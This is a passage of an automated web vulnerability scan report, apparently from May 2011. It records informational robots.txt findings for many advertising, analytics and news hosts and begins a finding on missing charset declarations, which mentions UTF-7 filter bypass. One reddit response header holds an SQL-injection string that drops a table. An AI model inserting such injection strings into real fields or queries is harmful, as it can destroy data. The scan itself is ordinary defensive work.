Host:   http://ad-emea.doubleclick.net
Path:   /N6514/adj/uk/uk-open

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT
Date: Thu, 12 May 2011 13:27:56 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
19.3. http://ad.doubleclick.net/adj/ars.dart/ce_gear  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ars.dart/ce_gear

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 12 May 2011 13:28:00 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
19.4. http://admeld-match.dotomi.com/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admeld-match.dotomi.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:35 GMT
Server: Apache
X-Name: rtb-o05
Last-Modified: Fri, 29 Oct 2010 05:55:56 GMT
ETag: "b50068-a2-493bb1cab5300"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

#do not edit this file in ms-platform, you need unix line seperators for it.
#this file will disallow any robots to search the dmc.
User-Agent: *
Disallow: /
19.5. http://adx.g.doubleclick.net/pagead/adview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 13:30:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
19.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/libs/jquery/1.4/jquery.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Thu, 12 May 2011 13:28:27 GMT
Expires: Thu, 12 May 2011 13:28:27 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
19.7. http://altfarm.mediaplex.com/ad/tr/10759-119438-1104-0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/tr/10759-119438-1104-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 12 May 2011 13:28:15 GMT
Connection: keep-alive

User-agent: *
Disallow: /
19.8. http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://arstechnica.com
Path:   /gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: arstechnica.com

Response

HTTP/1.1 200 OK
X-ID: .22/vm2
Vary: Accept-Encoding
Content-Type: text/plain
ETag: "220117889"
Last-Modified: Wed, 11 May 2011 20:14:44 GMT
Content-Length: 333
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Thu, 12 May 2011 13:27:50 GMT
X-Varnish: 304057622 304050655
Via: 1.1 varnish
Connection: close
X-Cache: HIT

User-agent: *
Allow: /
Disallow: /dragons/
Disallow: /civis/ucp.php
Disallow: /civis/images/
Disallow: /civis/memberlist.php
Disallow: /civis/adm/
Disallow: /civis/mcp.php
Disallow: /civis/posting.php
...[SNIP]...
19.9. http://b.scorecardresearch.com/beacon.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 13 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
19.10. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 13 May 2011 13:30:29 GMT
Date: Thu, 12 May 2011 13:30:29 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
19.11. http://badges.del.icio.us/feeds/json/url/data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badges.del.icio.us
Path:   /feeds/json/url/data

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: badges.del.icio.us

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=2592000
Expires: Sat, 11 Jun 2011 13:29:25 GMT
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 1236
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.4

User-agent: *
Disallow: /

User-agent: delicious-thumbnails
Allow: /


User-agent: Slurp
Allow: /
Disallow: /inbox
Disallow: /subscriptions
Disallow: /network
Disallow: /search
Disallow: /post
Disall
...[SNIP]...
19.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:28:00 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /
19.13. http://bwp.zdnet.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bwp.zdnet.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bwp.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:17 GMT
Server: Apache
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /
19.14. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_3_0/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 13:28:02 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /
19.15. http://dw.com.com/rubicsimp/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.com.com
Path:   /rubicsimp/c.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dw.com.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:16 GMT
Server: Apache/2.0
Last-Modified: Tue, 05 Oct 2010 02:03:43 GMT
Accept-Ranges: bytes
Content-Length: 854
Cache-Control: max-age=14400
Expires: Thu, 12 May 2011 17:28:16 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=363, max=748
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/third_party/apache2/configs/dw/dwcomcom/robots.txt,v $
# $Revision: 1.2 $
User-agent: *
Disallow: /Ads/
Disallow: /redir/
Disallow: /rubicsclk/
# Disallow: /i/ is removed per 1907
...[SNIP]...
19.16. http://dw.zdnet.com/clear/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw.zdnet.com
Path:   /clear/c.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dw.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:25 GMT
Server: Apache/2.0
Last-Modified: Tue, 05 Oct 2010 02:01:06 GMT
Accept-Ranges: bytes
Content-Length: 854
Cache-Control: max-age=14400
Expires: Thu, 12 May 2011 17:31:25 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Connection: close
Content-Type: text/plain

# $Source: /cvs/main/third_party/apache2/configs/dw/dwcomcom/robots.txt,v $
# $Revision: 1.2 $
User-agent: *
Disallow: /Ads/
Disallow: /redir/
Disallow: /rubicsclk/
# Disallow: /i/ is removed per 1907
...[SNIP]...
19.17. http://feeds.delicious.com/v2/json/urlinfo/data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/json/urlinfo/data

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=2592000
Expires: Sat, 11 Jun 2011 13:29:14 GMT
Last-Modified: Tue, 10 May 2011 23:41:14 GMT
Accept-Ranges: bytes
Content-Length: 1236
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.4

User-agent: *
Disallow: /

User-agent: delicious-thumbnails
Allow: /


User-agent: Slurp
Allow: /
Disallow: /inbox
Disallow: /subscriptions
Disallow: /network
Disallow: /search
Disallow: /post
Disall
...[SNIP]...
19.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 13:29:35 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
19.19. http://mads.com.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mads.com.com
Path:   /mac-ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mads.com.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:30 GMT
Server: Apache/2.2
Last-Modified: Tue, 05 Apr 2011 21:07:25 GMT
Accept-Ranges: bytes
Content-Length: 3614
Keep-Alive: timeout=15, max=910
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/ops/config/global/w/robots.txt,v $
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /av/
Disallow: /css/
Disal
...[SNIP]...
19.20. http://mads.zdnet.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mads.zdnet.com
Path:   /mac-ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mads.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:31 GMT
Server: Apache/2.2
Last-Modified: Tue, 05 Apr 2011 21:07:25 GMT
Accept-Ranges: bytes
Content-Length: 3614
Keep-Alive: timeout=15, max=716
Connection: Keep-Alive
Content-Type: text/plain

# $Source: /cvs/main/ops/config/global/w/robots.txt,v $
# $Revision: 1.26 $
#
User-agent: *
Disallow: /Ads/
Disallow: /redir/
# Disallow: /i/ is removed per 190723
Disallow: /av/
Disallow: /css/
Disal
...[SNIP]...
19.21. http://mashable.com/2011/05/11/google-chrome-notebooks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mashable.com
Path:   /2011/05/11/google-chrome-notebooks/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mashable.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 24 Apr 2011 19:28:55 GMT
ETag: "20e2b55-245-4a1af1a092bc0"
Cache-Control: max-age=259200, public, must-revalidate, proxy-revalidate
Content-Type: text/plain; charset=UTF-8
Content-Length: 581
Vary: Accept-Encoding
X-Cacheable: Yes
Date: Thu, 12 May 2011 13:28:27 GMT
Connection: close
X-Served-By: 261655-web2
X-Cache-Hits: 1398

User-agent: *
Disallow: /adcentric
Disallow: /adinterax
Disallow: /atlas
Disallow: /doubleclick
Disallow: /eyereturn
Disallow: /eyewonder
Disallow: /klipmart
Disallow: /pointroll
Disallow: /smartadser
...[SNIP]...
19.22. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-61YFdB4e9hBRs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 13:30:18 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 12 May 2011 13:30:18 GMT
Server: QS

User-agent: *
Disallow: /
19.23. http://pubads.g.doubleclick.net/gampad/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 13:29:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
19.24. http://routenote.com/blog/TFadvertising/300.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://routenote.com
Path:   /blog/TFadvertising/300.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: routenote.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 20 Apr 2011 11:46:40 GMT
ETag: "3a0946-6d2-4a1582d892800"
Accept-Ranges: bytes
Content-Length: 1746
Cache-Control: max-age=1209600
Expires: Thu, 26 May 2011 13:29:51 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...
19.25. http://s.gravatar.com/js/gprofiles.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /js/gprofiles.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Thu, 12 May 2011 13:29:42 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
19.26. http://service.zdnet.com/wi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://service.zdnet.com
Path:   /wi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: service.zdnet.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"62-1304368604000"
Last-Modified: Mon, 02 May 2011 20:36:44 GMT
Content-Type: text/plain
Content-Length: 62
Date: Thu, 12 May 2011 13:28:15 GMT
Connection: keep-alive

# Block indexing from Search Engines
User-agent: *
Disallow: /
19.27. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Thu, 12 May 2011 13:28:56 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
19.28. http://static.crowdscience.com/start-c2e7cdddce.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.crowdscience.com
Path:   /start-c2e7cdddce.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.crowdscience.com

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Thu, 12 May 2011 13:28:28 GMT
Content-Type: text/plain
Connection: close
ETag: "50d8a018e8ae96732c8a2ba663c61d4e"
X-CF1: fA.iad2:cf:cacheA.iad2-01
Content-Length: 23
Last-Modified: Fri, 05 Feb 2010 19:15:09 GMT
X-CF2: L
Accept-Ranges: bytes

User-agent: *
Disallow:
19.29. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Thu, 12 May 2011 11:37:25 GMT
ETag: "5abfbb-1a-4a3129cf6c740"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Thu, 12 May 2011 13:28:18 GMT
Connection: close

User-agent: *
Disallow: /
19.30. http://tags.crwdcntrl.net/c/313/cc_af.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /c/313/cc_af.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tags.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:57 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:21:02 GMT
ETag: "1520194-1a-4976134e6b780"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
19.31. http://tags.gawker.com/assets/minify.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.gawker.com
Path:   /assets/minify.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tags.gawker.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Thu, 12 May 2011 13:28:42 GMT
ETag: "1840f60-115-48fc147a07200"
GawkerApplication: ganja
GawkerApplicationHost: PEST-45
GawkerHost: GM33 - Request took D=206 at t=1290772800459637 on site fetch.gawker.com (live)
Last-Modified: Wed, 08 Sep 2010 15:36:40 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: ECAcc (dca/5364)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 277
Connection: close

User-Agent: Googlebot
Disallow: /index.xml$
Disallow: /excerpts.xml$
Disallow: /artists/$
Disallow: /322813/ # Remove post
Allow: /sitemap.xml$
Disallow: /*view=rss$
Disallow: /*?view=rss$
Disallow: /
...[SNIP]...
19.32. http://www.chromium.org/chromium-os  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chromium.org
Path:   /chromium-os

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chromium.org

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 13:28:16 GMT
Expires: Thu, 12 May 2011 13:28:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /feeds/
Disallow: /*/_/
19.33. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.27.93.127
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
19.34. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Expires: Thu, 12 May 2011 13:27:55 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
19.35. http://www.h-online.com/open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.h-online.com
Path:   /open/news/item/Google-s-Chrome-OS-machines-arrive-1242072.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.h-online.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:53 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 12:51:56 GMT
Accept-Ranges: bytes
Content-Length: 1828
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Revision: 3932 $
User-agent: MS Search 4.0 Robot
Disallow: /

User-agent: *
# Misc.
Disallow: /RealMedia/
Disallow: /advertisement/
Disallow: /bin/
Disallow: /fastbin/
Disallow: /icons/
Disallow: /
...[SNIP]...
19.36. http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/227430/chrome_os_will_likely_include_netflix_support.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:00 GMT
Server: Apache
X-GasHost: gas3
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 457
Content-Length: 1470
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Etag: W/"1470-1297458026000"
Content-Type: text/plain
Vary: Accept-Encoding
Connection: close

Sitemap: http://static.pcworld.com/sitemap/sitemap_index.xml
Sitemap: http://www.pcworld.com/googlenewssitemap.xml

User-agent: Googlebot
Disallow: /emailfriend
Disallow: /printable
Disallow: /r
...[SNIP]...
19.37. http://www.reddit.com/button.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reddit.com
Path:   /button.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reddit.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 15 Apr 2011 21:24:15 GMT
ETag: 1302902655.93-734
Server: '; DROP TABLE servertypes; --
Date: Thu, 12 May 2011 13:29:30 GMT
Content-Length: 734
Connection: close

# 80legs
User-agent: 008
Disallow: /

# MSNBot
User-Agent: msnbot
Crawl-Delay: 20

User-Agent: bender
Disallow: /my_shiny_metal_ass

User-Agent: Gort
Disallow: /earth

User-Agent: *
Disallow: /*.json

...[SNIP]...
19.38. http://www.stumbleupon.com/hostedbadge.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /hostedbadge.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:49 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Thu, 12 May 2011 13:29:34 GMT
Age: 62
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...
19.39. http://www.youtube.com/embed/TVqe8ieqz10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/TVqe8ieqz10

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:29 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 19:31:59 GMT
ETag: "21b-49c06c06dc9c0"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...
19.40. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:56 GMT
Server: Apache
Last-Modified: Fri, 06 May 2011 00:20:10 GMT
Accept-Ranges: bytes
Content-Length: 2142
Keep-Alive: timeout=15, max=970
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot-Mobile
Disallow: /
User-agent: YahooSeeker/M1A1-R2D2
Disallow: /
User-agent: MSNBOT_Mobile
Disallow: /

User-agent: *
Disallow: /adlog/
Disallow: /Ads/
Disallow: /av/
Disallow: /
...[SNIP]...
20. HTML does not specify charset  previous  next
There are 36 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

